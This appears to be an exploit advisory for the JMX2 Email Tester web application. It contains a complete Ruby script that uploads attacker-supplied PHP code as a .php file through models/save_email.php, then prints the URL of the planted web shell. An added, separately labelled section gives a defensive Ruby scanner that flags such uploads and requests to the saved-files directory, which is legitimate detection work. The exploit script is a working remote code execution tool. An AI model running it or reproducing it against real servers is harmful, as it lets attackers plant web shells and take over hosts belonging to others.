JMX2 Email Tester - Web Shell Upload(save_email.php)

2016.02.16
Credit: HaHwul
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-264

# Exploit Title: JMX2 Email Tester - Web Shell Upload(save_email.php)
# Date: 2016-02-15
# Blog: http://www.hahwul.com
# Vendor Homepage: https://github.com/johnfmorton/jmx2-Email-Tester
# Software Link: https://github.com/johnfmorton/jmx2-Email-Tester/archive/master.zip
# Tested on: debian [wheezy]
# CVE : none

require "net/http"
require "uri"
require 'uri-handler'

if ARGV.length != 2
  puts "JMX2 Email Tester Web Shell Uploader"
  puts "Usage: #>ruby jmx2Email_exploit.rb [targetURL] [phpCode]"
  puts " targetURL(ex): http://127.0.0.1/vul_test/jmx2-Email-Tester"
  puts " phpCode(ex): echo 'zzzzz'"
  puts " Example : ~~.rb http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester 'echo zzzz'"
  puts " Install GEM: #> gem install uri-handler"
  puts " exploit & code by hahwul[www.hahwul.com]"
else
  target_url = ARGV[0] # http://127.0.0.1/jmx2-Email-Tester/
  shell = ARGV[1] # PHP Code
  shell = shell.to_uri
  exp_url = target_url + "/models/save_email.php"
  puts shell
  uri = URI.parse(exp_url)
  http = Net::HTTP.new(uri.host, uri.port)
  puts exp_url
  request = Net::HTTP::Post.new(uri.request_uri)
  request["Accept-Encoding"] = "gzip, deflate"
  request["Referer"] = "http://127.0.0.1/vul_test/jmx2-Email-Tester/emailTester/"
  request["User-Agent"] = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:44.0) Gecko/20100101 Firefox/44.0"
  request["Accept"] = "application/json, text/javascript, */*; q=0.01"
  request["Content-Type"] = "application/x-www-form-urlencoded; charset=UTF-8"
  request["Connection"] = "keep-alive"
  request.set_form_data({"orgfilename"=>"test-email-1455499197-org.html","thecontent"=>"%3Chtml%3E%0A%20%20%20%3C%3Fphp%20%0A#{shell}%0A%3F%3E%0A%3C%2Fhtml%3E","inlinefilename"=>"test-email-1455499197-inline.php"})
  response = http.request(request)
  puts "[Result] Status code: "+response.code
  puts "[Result] Open Browser: "+target_url+"/_saved_email_files/test-email-1455499197-inline.php"
end

References:

http://www.hahwul.com
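
Added example (not part of the original advisory or the JMX2 project): a Ruby triage pass over recorded HTTP requests that flags what this PoC produces, namely a POST to models/save_email.php that names a non-HTML file or carries a PHP open tag, and later requests for non-HTML files under _saved_email_files. The record layout, the sample requests, the SAFE_NAME policy and the helper names are constructed assumptions.

```ruby
require "uri"

# Constructed sample records [method, path, raw form body]; not real traffic.
SAMPLE_REQUESTS = [
  ["POST", "/emailTester/models/save_email.php",
   "orgfilename=a-org.html&thecontent=%3Chtml%3Ehi%3C%2Fhtml%3E&inlinefilename=a-inline.html"],
  ["POST", "/emailTester/models/save_email.php",
   "orgfilename=b-org.html&inlinefilename=b-inline.php&thecontent=%253C%253Fphp%2520x%2520%253F%253E"],
  ["GET", "/emailTester/_saved_email_files/b-inline.php", ""]
].freeze
# Assumed policy: saved files are plain basenames ending in .html or .htm.
SAFE_NAME = /\A[A-Za-z0-9_-]+\.html?\z/

# The PoC's body is percent-encoded twice on the wire, so decode until stable.
def fully_decode(value, rounds = 3)
  rounds.times do
    decoded = URI.decode_www_form_component(value)
    return decoded if decoded == value
    value = decoded
  end
  value
rescue ArgumentError
  value # a stray "%" means nothing is left to decode
end

# Reasons one request looks like this upload, or like a fetch of its result.
def findings(method, path, body)
  path = path.to_s.sub(/\?.*\z/m, "")
  out = []
  if method == "POST" && path.end_with?("/models/save_email.php")
    form = URI.decode_www_form(body).to_h
    %w[orgfilename inlinefilename].each do |key|
      name = fully_decode(form.fetch(key, ""))
      out << "#{key}: unsafe name #{name.inspect}" unless name.match?(SAFE_NAME)
    end
    content = fully_decode(form.fetch("thecontent", ""))
    out << "thecontent: PHP open tag" if content.match?(/<\?(php|=|\s)/i)
  elsif path.include?("/_saved_email_files/") && !File.basename(path).match?(SAFE_NAME)
    out << "request for non-HTML file in _saved_email_files"
  end
  out
rescue ArgumentError
  ["malformed form encoding"]
end

def scan(requests) # [index, reasons] for every flagged request
  requests.each_with_index.map { |(m, p, b), i| [i, findings(m, p, b)] }.reject { |_, h| h.empty? }
end

scan(SAMPLE_REQUESTS).each { |i, hits| puts "request #{i}: #{hits.join('; ')}" }
```

The same SAFE_NAME test can be run over the contents of the _saved_email_files directory itself to find files that were already written with an executable extension.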

